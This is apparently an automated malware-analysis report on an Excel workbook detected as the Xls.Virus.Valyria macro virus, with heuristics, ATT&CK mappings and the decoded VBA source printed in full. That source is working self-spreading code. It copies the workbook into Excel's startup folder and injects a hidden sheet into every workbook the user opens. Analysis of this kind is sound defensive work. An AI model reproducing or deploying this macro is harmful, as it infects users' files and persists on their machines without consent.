MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros, specifically an Auto_Open macro. This macro is designed to copy itself to the Excel startup directory ('XLSTART') as 'mypersonnel.xls'. This action establishes persistence, ensuring the malicious macro executes every time Microsoft Excel is launched. The document body appears to be a legitimate project deployment schedule, likely used as a lure.
Heuristics 4
-
ClamAV: Xls.Virus.Valyria-10004391-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Virus.Valyria-10004391-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1304 bytes |
SHA-256: 3521c9120c3d6f6198577135f38f2fd19b399dd53636d28342651a276b50413f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 17408 bytes |
SHA-256: f4464192d111fa7812a3038544056963ed8c051b6936bfb83944e7c0f003fa21 |
|||
|
Detection
ClamAV:
Xls.Virus.Valyria-10004391-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.